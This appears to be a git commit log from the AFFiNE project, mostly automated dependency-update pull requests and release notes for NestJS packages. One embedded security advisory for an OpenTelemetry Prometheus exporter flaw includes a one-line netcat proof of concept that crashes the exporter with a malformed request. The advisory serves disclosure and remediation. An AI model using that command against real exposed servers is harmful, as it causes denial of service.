([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

</details>

<details>
<summary>nestjs/schedule (@&#8203;nestjs/schedule)</summary>

###
[`v6.1.3`](https://redirect.github.com/nestjs/schedule/releases/tag/6.1.3)

[Compare
Source](https://redirect.github.com/nestjs/schedule/compare/6.1.2...6.1.3)

#### What's Changed

- feat(cron): add initialDelay option to defer first job execution by
[@&#8203;kyungseopk1m](https://redirect.github.com/kyungseopk1m) in
[#&#8203;2251](https://redirect.github.com/nestjs/schedule/pull/2251)

**Full Changelog**:
<https://github.com/nestjs/schedule/compare/6.1.2...6.1.3>

###
[`v6.1.2`](https://redirect.github.com/nestjs/schedule/releases/tag/6.1.2)

[Compare
Source](https://redirect.github.com/nestjs/schedule/compare/6.1.1...6.1.2)

- Merge pull request
[#&#8203;2247](https://redirect.github.com/nestjs/schedule/issues/2247)
from kyungseopk1m/feat/cron-initial-delay
([`a57ce2c`](https://redirect.github.com/nestjs/schedule/commit/a57ce2c))
- chore(deps): update dependency prettier to v3.8.3
([#&#8203;2248](https://redirect.github.com/nestjs/schedule/issues/2248))
([`bb3490d`](https://redirect.github.com/nestjs/schedule/commit/bb3490d))
- feat(cron): add initialDelay option to defer first job execution
([`1c5677f`](https://redirect.github.com/nestjs/schedule/commit/1c5677f))
- Merge pull request
[#&#8203;2245](https://redirect.github.com/nestjs/schedule/issues/2245)
from nestjs/renovate/nest-monorepo
([`59046bd`](https://redirect.github.com/nestjs/schedule/commit/59046bd))
- Merge pull request
[#&#8203;2246](https://redirect.github.com/nestjs/schedule/issues/2246)
from nestjs/renovate/oxlint-monorepo
([`be4eee3`](https://redirect.github.com/nestjs/schedule/commit/be4eee3))
- chore(deps): update dependency oxlint to v1.60.0
([`32a9ce2`](https://redirect.github.com/nestjs/schedule/commit/32a9ce2))
- chore(deps): update nest monorepo to v11.1.19
([`7d3844f`](https://redirect.github.com/nestjs/schedule/commit/7d3844f))
- chore: migrate to oxlint, vitest, ts6
([`29de71b`](https://redirect.github.com/nestjs/schedule/commit/29de71b))
- chore(deps): update dependency globals to v17.5.0
([#&#8203;2244](https://redirect.github.com/nestjs/schedule/issues/2244))
([`6c62cca`](https://redirect.github.com/nestjs/schedule/commit/6c62cca))
- chore(deps): update dependency sinon to v21.1.2
([#&#8203;2243](https://redirect.github.com/nestjs/schedule/issues/2243))
([`ee3b31a`](https://redirect.github.com/nestjs/schedule/commit/ee3b31a))
- chore(deps): update dependency sinon to v21.1.1
([#&#8203;2241](https://redirect.github.com/nestjs/schedule/issues/2241))
([`eba9799`](https://redirect.github.com/nestjs/schedule/commit/eba9799))
- Merge pull request
[#&#8203;2242](https://redirect.github.com/nestjs/schedule/issues/2242)
from nestjs/renovate/prettier-3.x
([`c3ad0f7`](https://redirect.github.com/nestjs/schedule/commit/c3ad0f7))
- chore(deps): update dependency prettier to v3.8.2
([`798e2a9`](https://redirect.github.com/nestjs/schedule/commit/798e2a9))
- Merge pull request
[#&#8203;2199](https://redirect.github.com/nestjs/schedule/issues/2199)
from nestjs/renovate/cimg-node-24.x
([`a05354a`](https://redirect.github.com/nestjs/schedule/commit/a05354a))
- chore(deps): update dependency typescript-eslint to v8.58.1
([#&#8203;2240](https://redirect.github.com/nestjs/schedule/issues/2240))
([`0367ac1`](https://redirect.github.com/nestjs/schedule/commit/0367ac1))
- chore(deps): update dependency eslint to v10.2.0
([#&#8203;2239](https://redirect.github.com/nestjs/schedule/issues/2239))
([`fa93e06`](https://redirect.github.com/nestjs/schedule/commit/fa93e06))
- chore(deps): update nest monorepo to v11.1.18
([#&#8203;2238](https://redirect.github.com/nestjs/schedule/issues/2238))
([`8cd4c02`](https://redirect.github.com/nestjs/schedule/commit/8cd4c02))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to v24.12.2
([#&#8203;2237](https://redirect.github.com/nestjs/schedule/issues/2237))
([`01482df`](https://redirect.github.com/nestjs/schedule/commit/01482df))
- chore(deps): update dependency
[@&#8203;types/sinon](https://redirect.github.com/types/sinon) to
v21.0.1
([#&#8203;2236](https://redirect.github.com/nestjs/schedule/issues/2236))
([`f05b5bd`](https://redirect.github.com/nestjs/schedule/commit/f05b5bd))
- chore(deps): update dependency ts-jest to v29.4.9
([#&#8203;2235](https://redirect.github.com/nestjs/schedule/issues/2235))
([`af545e6`](https://redirect.github.com/nestjs/schedule/commit/af545e6))
- chore(deps): update dependency typescript-eslint to v8.58.0
([#&#8203;2233](https://redirect.github.com/nestjs/schedule/issues/2233))
([`4dad22a`](https://redirect.github.com/nestjs/schedule/commit/4dad22a))
- chore(deps): update node.js to v24.14.1
([`28db9bc`](https://redirect.github.com/nestjs/schedule/commit/28db9bc))
- chore(deps): update dependency eslint to v10.1.0
([#&#8203;2232](https://redirect.github.com/nestjs/schedule/issues/2232))
([`413f390`](https://redirect.github.com/nestjs/schedule/commit/413f390))
- chore(deps): update nest monorepo to v11.1.17
([#&#8203;2230](https://redirect.github.com/nestjs/schedule/issues/2230))
([`46c2bc5`](https://redirect.github.com/nestjs/schedule/commit/46c2bc5))
- chore(deps): update dependency typescript-eslint to v8.57.1
([#&#8203;2231](https://redirect.github.com/nestjs/schedule/issues/2231))
([`8fd063b`](https://redirect.github.com/nestjs/schedule/commit/8fd063b))
- chore(deps): update dependency sinon to v21.0.3
([#&#8203;2229](https://redirect.github.com/nestjs/schedule/issues/2229))
([`1671ad9`](https://redirect.github.com/nestjs/schedule/commit/1671ad9))
- chore(deps): update commitlint monorepo to v20.5.0
([#&#8203;2228](https://redirect.github.com/nestjs/schedule/issues/2228))
([`2ecd2f1`](https://redirect.github.com/nestjs/schedule/commit/2ecd2f1))
- chore(deps): update dependency lint-staged to v16.4.0
([#&#8203;2227](https://redirect.github.com/nestjs/schedule/issues/2227))
([`aa0de01`](https://redirect.github.com/nestjs/schedule/commit/aa0de01))
- chore(deps): update commitlint monorepo to v20.4.4
([#&#8203;2226](https://redirect.github.com/nestjs/schedule/issues/2226))
([`75034fe`](https://redirect.github.com/nestjs/schedule/commit/75034fe))
- chore(deps): update dependency lint-staged to v16.3.3
([#&#8203;2225](https://redirect.github.com/nestjs/schedule/issues/2225))
([`f1c7d31`](https://redirect.github.com/nestjs/schedule/commit/f1c7d31))
- chore(deps): update dependency jest to v30.3.0
([#&#8203;2224](https://redirect.github.com/nestjs/schedule/issues/2224))
([`1a208d4`](https://redirect.github.com/nestjs/schedule/commit/1a208d4))
- chore(deps): update dependency typescript-eslint to v8.57.0
([#&#8203;2223](https://redirect.github.com/nestjs/schedule/issues/2223))
([`60dd2c9`](https://redirect.github.com/nestjs/schedule/commit/60dd2c9))
- chore(deps): update dependency eslint to v10.0.3
([#&#8203;2221](https://redirect.github.com/nestjs/schedule/issues/2221))
([`791b6ba`](https://redirect.github.com/nestjs/schedule/commit/791b6ba))
- chore(deps): update dependency
[@&#8203;eslint/eslintrc](https://redirect.github.com/eslint/eslintrc)
to v3.3.5
([#&#8203;2220](https://redirect.github.com/nestjs/schedule/issues/2220))
([`0da1ca7`](https://redirect.github.com/nestjs/schedule/commit/0da1ca7))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to v24.12.0
([#&#8203;2219](https://redirect.github.com/nestjs/schedule/issues/2219))
([`934a93e`](https://redirect.github.com/nestjs/schedule/commit/934a93e))
- chore(deps): update nest monorepo to v11.1.16
([#&#8203;2218](https://redirect.github.com/nestjs/schedule/issues/2218))
([`5f44e9b`](https://redirect.github.com/nestjs/schedule/commit/5f44e9b))
- chore(deps): update dependency sinon to v21.0.2
([#&#8203;2217](https://redirect.github.com/nestjs/schedule/issues/2217))
([`b807746`](https://redirect.github.com/nestjs/schedule/commit/b807746))
- chore(deps): update dependency lint-staged to v16.3.2
([#&#8203;2216](https://redirect.github.com/nestjs/schedule/issues/2216))
([`4ca32bd`](https://redirect.github.com/nestjs/schedule/commit/4ca32bd))
- chore(deps): update commitlint monorepo to v20.4.3
([#&#8203;2215](https://redirect.github.com/nestjs/schedule/issues/2215))
([`d3ceb76`](https://redirect.github.com/nestjs/schedule/commit/d3ceb76))
- chore(deps): update nest monorepo to v11.1.15
([#&#8203;2214](https://redirect.github.com/nestjs/schedule/issues/2214))
([`b084ffc`](https://redirect.github.com/nestjs/schedule/commit/b084ffc))
- chore(deps): update dependency lint-staged to v16.3.1
([#&#8203;2213](https://redirect.github.com/nestjs/schedule/issues/2213))
([`8a201b2`](https://redirect.github.com/nestjs/schedule/commit/8a201b2))
- chore(deps): update dependency globals to v17.4.0
([#&#8203;2212](https://redirect.github.com/nestjs/schedule/issues/2212))
([`6f61793`](https://redirect.github.com/nestjs/schedule/commit/6f61793))
- chore(deps): update dependency lint-staged to v16.3.0
([#&#8203;2211](https://redirect.github.com/nestjs/schedule/issues/2211))
([`aa9213a`](https://redirect.github.com/nestjs/schedule/commit/aa9213a))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to v24.11.0
([#&#8203;2210](https://redirect.github.com/nestjs/schedule/issues/2210))
([`c70b928`](https://redirect.github.com/nestjs/schedule/commit/c70b928))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to
v24.10.15
([#&#8203;2209](https://redirect.github.com/nestjs/schedule/issues/2209))
([`0f596b9`](https://redirect.github.com/nestjs/schedule/commit/0f596b9))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to
v24.10.14
([#&#8203;2208](https://redirect.github.com/nestjs/schedule/issues/2208))
([`dac8cca`](https://redirect.github.com/nestjs/schedule/commit/dac8cca))
- chore(deps): update dependency eslint to v10.0.2
([#&#8203;2207](https://redirect.github.com/nestjs/schedule/issues/2207))
([`abe6fce`](https://redirect.github.com/nestjs/schedule/commit/abe6fce))
- chore(deps): update dependency
[@&#8203;eslint/eslintrc](https://redirect.github.com/eslint/eslintrc)
to v3.3.4
([#&#8203;2206](https://redirect.github.com/nestjs/schedule/issues/2206))
([`cb32a40`](https://redirect.github.com/nestjs/schedule/commit/cb32a40))
- chore(deps): update dependency typescript-eslint to v8.56.1
([#&#8203;2205](https://redirect.github.com/nestjs/schedule/issues/2205))
([`88e1e6c`](https://redirect.github.com/nestjs/schedule/commit/88e1e6c))
- chore(deps): update dependency eslint to v10.0.1
([#&#8203;2204](https://redirect.github.com/nestjs/schedule/issues/2204))
([`55e5406`](https://redirect.github.com/nestjs/schedule/commit/55e5406))
- chore(deps): update commitlint monorepo to v20.4.2
([#&#8203;2203](https://redirect.github.com/nestjs/schedule/issues/2203))
([`4e55d62`](https://redirect.github.com/nestjs/schedule/commit/4e55d62))
- chore(deps): update nest monorepo to v11.1.14
([#&#8203;2202](https://redirect.github.com/nestjs/schedule/issues/2202))
([`d23ea1a`](https://redirect.github.com/nestjs/schedule/commit/d23ea1a))
- chore(deps): update eslint monorepo to v10
([#&#8203;2195](https://redirect.github.com/nestjs/schedule/issues/2195))
([`c2fcbc3`](https://redirect.github.com/nestjs/schedule/commit/c2fcbc3))
- chore(deps): update dependency typescript-eslint to v8.56.0
([#&#8203;2201](https://redirect.github.com/nestjs/schedule/issues/2201))
([`a93ebc4`](https://redirect.github.com/nestjs/schedule/commit/a93ebc4))
- chore(deps): update dependency rimraf to v6.1.3
([#&#8203;2200](https://redirect.github.com/nestjs/schedule/issues/2200))
([`1906e80`](https://redirect.github.com/nestjs/schedule/commit/1906e80))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to
v24.10.13
([#&#8203;2198](https://redirect.github.com/nestjs/schedule/issues/2198))
([`244cb84`](https://redirect.github.com/nestjs/schedule/commit/244cb84))
- chore(deps): update dependency typescript-eslint to v8.55.0
([#&#8203;2197](https://redirect.github.com/nestjs/schedule/issues/2197))
([`6b00083`](https://redirect.github.com/nestjs/schedule/commit/6b00083))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to
v24.10.12
([#&#8203;2196](https://redirect.github.com/nestjs/schedule/issues/2196))
([`b310c95`](https://redirect.github.com/nestjs/schedule/commit/b310c95))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to
v24.10.11
([#&#8203;2194](https://redirect.github.com/nestjs/schedule/issues/2194))
([`d05dca5`](https://redirect.github.com/nestjs/schedule/commit/d05dca5))

</details>

<details>
<summary>nestjs/swagger (@&#8203;nestjs/swagger)</summary>

###
[`v11.4.2`](https://redirect.github.com/nestjs/swagger/compare/11.4.1...b0a35f3b20bedc6e6756f476cee182700a199b6e)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.4.1...11.4.2)

###
[`v11.4.1`](https://redirect.github.com/nestjs/swagger/compare/11.4.0...14bd8f58d6011a1be03e266e39e472be0d4d3795)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.4.0...11.4.1)

###
[`v11.4.0`](https://redirect.github.com/nestjs/swagger/releases/tag/11.4.0)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.3.2...11.4.0)

#### 11.4.0 (2026-04-22)

##### Features

- [#&#8203;3868](https://redirect.github.com/nestjs/swagger/pull/3868)
feat(plugin): auto-mark optional
[@&#8203;Query](https://redirect.github.com/Query) parameters as
required: false
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3725](https://redirect.github.com/nestjs/swagger/pull/3725)
feat(swagger): add OpenAPI 3.2 hierarchical tags support
([@&#8203;apt-bh](https://redirect.github.com/apt-bh))

##### Bug fixes

- [#&#8203;3874](https://redirect.github.com/nestjs/swagger/pull/3874)
fix(document-builder): accept multi-digit OpenAPI version segments
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3873](https://redirect.github.com/nestjs/swagger/pull/3873)
fix(plugin): strip regex delimiters and flags from
[@&#8203;Matches](https://redirect.github.com/Matches) patterns
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3870](https://redirect.github.com/nestjs/swagger/pull/3870)
fix(decorators): forward all OpenAPI parameter fields in
[@&#8203;ApiHeader](https://redirect.github.com/ApiHeader)
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3872](https://redirect.github.com/nestjs/swagger/pull/3872)
fix(plugin): emit [@&#8203;throws](https://redirect.github.com/throws)
descriptions as proper string literals
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3782](https://redirect.github.com/nestjs/swagger/pull/3782)
fix(schema): preserve example metadata for non-body params with named
types ([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3761](https://redirect.github.com/nestjs/swagger/pull/3761)
fix(plugin): support boolean literal types and boolean enum values
([@&#8203;lucreiss](https://redirect.github.com/lucreiss))

##### Enhancements

- [#&#8203;3865](https://redirect.github.com/nestjs/swagger/pull/3865)
feat(schema-object-factory): include class name chain in circular
dependency errors
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

##### Committers: 4

- Lu R A ([@&#8203;lucreiss](https://redirect.github.com/lucreiss))
- Maruthan G
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- Yogeshwaran C
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [@&#8203;apt-bh](https://redirect.github.com/apt-bh)

###
[`v11.3.2`](https://redirect.github.com/nestjs/swagger/compare/11.3.1...b16a1e19a8b7161e13c01c636acf3a187eabbd06)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.3.1...11.3.2)

###
[`v11.3.1`](https://redirect.github.com/nestjs/swagger/compare/11.3.0...93744af0bb923daeebcc2b674bc7957d778d3953)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.3.0...11.3.1)

###
[`v11.3.0`](https://redirect.github.com/nestjs/swagger/releases/tag/11.3.0)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.2.7...11.3.0)

#### 11.3.0 (2026-04-15)

##### Bug fixes

- [#&#8203;3826](https://redirect.github.com/nestjs/swagger/pull/3826)
fix: support nullable field in
[@&#8203;ApiResponse](https://redirect.github.com/ApiResponse) decorator
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3784](https://redirect.github.com/nestjs/swagger/pull/3784)
fix(schema): include type field when nullable is used with allOf
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3774](https://redirect.github.com/nestjs/swagger/pull/3774)
fix enum issue
([@&#8203;SupunGeethanjana](https://redirect.github.com/SupunGeethanjana))
- [#&#8203;3798](https://redirect.github.com/nestjs/swagger/pull/3798)
fix(plugin): normalize workspace package import paths in metadata
generator ([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3821](https://redirect.github.com/nestjs/swagger/pull/3821)
fix(plugin): handle same-file type references in SWC readonly metadata
generation ([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3822](https://redirect.github.com/nestjs/swagger/pull/3822)
fix(type-helpers): eagerly apply plugin metadata properties in mapped
type helpers
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3840](https://redirect.github.com/nestjs/swagger/pull/3840)
fix: use child class type when re-declaring an inherited
[@&#8203;ApiProperty](https://redirect.github.com/ApiProperty)
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))

##### Enhancements

- [#&#8203;3449](https://redirect.github.com/nestjs/swagger/pull/3449)
feat(api-header): add example property to ApiHeader decorator
([@&#8203;leemhoon00](https://redirect.github.com/leemhoon00))
- [#&#8203;3787](https://redirect.github.com/nestjs/swagger/pull/3787)
feat(decorators): support RegExp instances in
[@&#8203;ApiProperty](https://redirect.github.com/ApiProperty)({ pattern
}) ([@&#8203;temrjan](https://redirect.github.com/temrjan))
- [#&#8203;3699](https://redirect.github.com/nestjs/swagger/pull/3699)
feat(api-body): add support for encoding in ApiBody decorator
([@&#8203;lamuertepeluda](https://redirect.github.com/lamuertepeluda))
- [#&#8203;3824](https://redirect.github.com/nestjs/swagger/pull/3824)
feat: support async patchDocumentOnRequest hook
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3834](https://redirect.github.com/nestjs/swagger/pull/3834)
feat: expose generateSchema utility for programmatic schema access
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3836](https://redirect.github.com/nestjs/swagger/pull/3836)
feat(plugin): add autoFillEnumName option to suppress duplicate enum
schemas
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3837](https://redirect.github.com/nestjs/swagger/pull/3837)
feat: merge descriptions when multiple decorators share the same HTTP
status code
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3839](https://redirect.github.com/nestjs/swagger/pull/3839)
feat: add excludeDynamicDefaults option to strip runtime-evaluated
schema defaults
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3841](https://redirect.github.com/nestjs/swagger/pull/3841)
feat: add DeepPartialType mapped-type helper for recursive optional
properties
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))

##### Dependencies

- [#&#8203;3850](https://redirect.github.com/nestjs/swagger/pull/3850)
fix(deps): update dependency swagger-ui-dist to v5.32.4
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))

##### Committers: 7

- JongHun Lim
([@&#8203;leemhoon00](https://redirect.github.com/leemhoon00))
- Maruthan G
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- Rajasekar Janakiraman
([@&#8203;rajasekar33](https://redirect.github.com/rajasekar33))
- Supun Geethanjana Jayasinghe
([@&#8203;SupunGeethanjana](https://redirect.github.com/SupunGeethanjana))
- Temrjan ([@&#8203;temrjan](https://redirect.github.com/temrjan))
- Vito Macchia
([@&#8203;lamuertepeluda](https://redirect.github.com/lamuertepeluda))
-
[@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNTYuMSIsInVwZGF0ZWRJblZlciI6IjQzLjE3My42IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-14 01:25:23 +08:00
DarkSky 659072183c chore: bump deps 2026-05-13 22:26:02 +08:00
DarkSky e222f06e94 feat(editor): extract chat runtime (#14937)
#### PR Dependency Tree


* **PR #14937** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Centralized AI event system and a runtime powering chat sessions and
actions.

* **Improvements**
* Chat UI (composer, messages, toolbar, tabs, panels) now syncs with
runtime snapshots for more consistent state.
* Improved session/tab lifecycle (create, fork, delete), context
embedding status, and history handling.
* More reliable send/stop/retry flows, better telemetry scoping, and
clearer upgrade/login/insert-template prompts.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-13 21:57:50 +08:00
DarkSky 322f2ba986 fix(server): migrate old tables (#14954) 2026-05-13 21:57:28 +08:00
renovate[bot] f19a922793 chore: bump up @opentelemetry/sdk-node version to ^0.217.0 [SECURITY] (#14945)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.215.0` →
`^0.217.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.215.0/0.217.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-node/0.217.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-node/0.215.0/0.217.0?slim=true)
|

---

### Prometheus exporter process crash via malformed HTTP request
[CVE-2026-44902](https://nvd.nist.gov/vuln/detail/CVE-2026-44902) /
[GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)

<details>
<summary>More information</summary>

#### Details
##### Summary

A single malformed HTTP request crashes any Node.js process running the
OpenTelemetry JS Prometheus exporter. The metrics endpoint (default
`0.0.0.0:9464`) has no error handling around URL parsing, so a request
with an invalid URI causes an uncaught `TypeError` that terminates the
process.

**You are affected by this vulnerability if either of the following
apply to your application:**

* you directly use `@opentelemetry/exporter-prometheus` in your code
through its built-in server.
* your `OTEL_METRICS_EXPORTER` environment variable includes
`prometheus` **AND**
  * you use `@opentelemetry/sdk-node`
* you use `@opentelemetry/auto-instrumentations-node` via `--require
@&#8203;opentelemetry/auto-instrumentations-node/register`/`--import
@&#8203;opentelemetry/auto-instrumentations-node/register`

##### Impact

**Denial of service.** Any application using the OpenTelemetry
Prometheus exporter’s built-in server can be crashed by a single
unauthenticated network packet sent to the metrics port. No
authentication, special privileges, or prior access is required.

##### Remediation

##### Update to the fixed version

Update `@opentelemetry/exporter-prometheus` and
`@opentelemetry/sdk-node` to version **0.217.0** or later.
Update `@opentelemetry/auto-instrumentations-node` to version **0.75.0**
or later.

This release adds proper error handling around the URL constructor,
returning an HTTP `400` response on parse failure rather than allowing
the exception to propagate and crash the process.

```
npm install @&#8203;opentelemetry/exporter-prometheus@latest
```

##### Do Not Expose the Endpoint to Untrusted Users

> [!IMPORTANT] 
> The following mitigations reduce exposure but do not fully remediate
the vulnerability. Any client that *can* reach the metrics endpoint -
including your own Prometheus scraper host if compromised - could still
trigger the crash. Updating to **0.217.0** is the recommended
resolution.

If updating is not immediately feasible, restrict access to the metrics
endpoint so that it is not reachable by untrusted or unauthenticated
network clients. For example:

* **Bind to localhost only** by setting the `host` option to `127.0.0.1`
when configuring the `PrometheusExporter`, so the port is not exposed on
public or shared network interfaces

* **Use a firewall or network policy** to restrict access to port `9464`
(or whichever port you have configured) to only trusted Prometheus
scrape hosts

* **Place the endpoint behind a reverse proxy** that filters or
validates incoming requests before they reach the exporter

##### Details

In `PrometheusExporter.ts`, the `_requestHandler` calls `new
URL(request.url, this._baseUrl)` without any error handling. Node's HTTP
parser accepts absolute-form URIs (e.g. `http://`) for proxy
compatibility, including malformed ones. When `request.url` is
`"http://"`, the `URL` constructor throws `TypeError: Invalid URL`.
Since there is no try-catch in the handler, the exception propagates as
an uncaught exception and crashes the process.

The Prometheus metrics endpoint is unauthenticated by design (Prometheus
scrapes it) and binds to `0.0.0.0` by default, meaning it is reachable
by any network client that can connect to the metrics port.

##### Proof of Concept

Start any Node.js application with the Prometheus exporter running on
the default port `9464`, then send a single raw TCP packet:

```
echo -ne 'GET http:// HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc localhost 9464
```

The process crashes immediately with:

```
TypeError: Invalid URL
    at new URL (...)
    at PrometheusExporter._requestHandler (...)
```

#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`

#### References
-
[https://github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3)
-
[https://github.com/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js
(@&#8203;opentelemetry/sdk-node)</summary>

###
[`v0.217.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c)

###
[`v0.216.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNTkuMiIsInVwZGF0ZWRJblZlciI6IjQzLjE1OS4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-12 18:55:30 +08:00
DarkSky a1d150a748 fix(server): realtime module not loaded (#14952)
#### PR Dependency Tree


* **PR #14952** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Refactor**
* Optimized workspace invite link fetching by separating it from general
workspace configuration queries for improved performance.
* Reorganized transcription-related backend modules to better separate
concerns and enable real-time functionality.

* **Chores**
* Updated generated GraphQL types and iOS query definitions to reflect
API changes.

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14952)

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-12 18:54:42 +08:00
renovate[bot] ac6d0d35af chore: bump up @opentelemetry/exporter-prometheus version to ^0.217.0 [SECURITY] (#14944)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus)
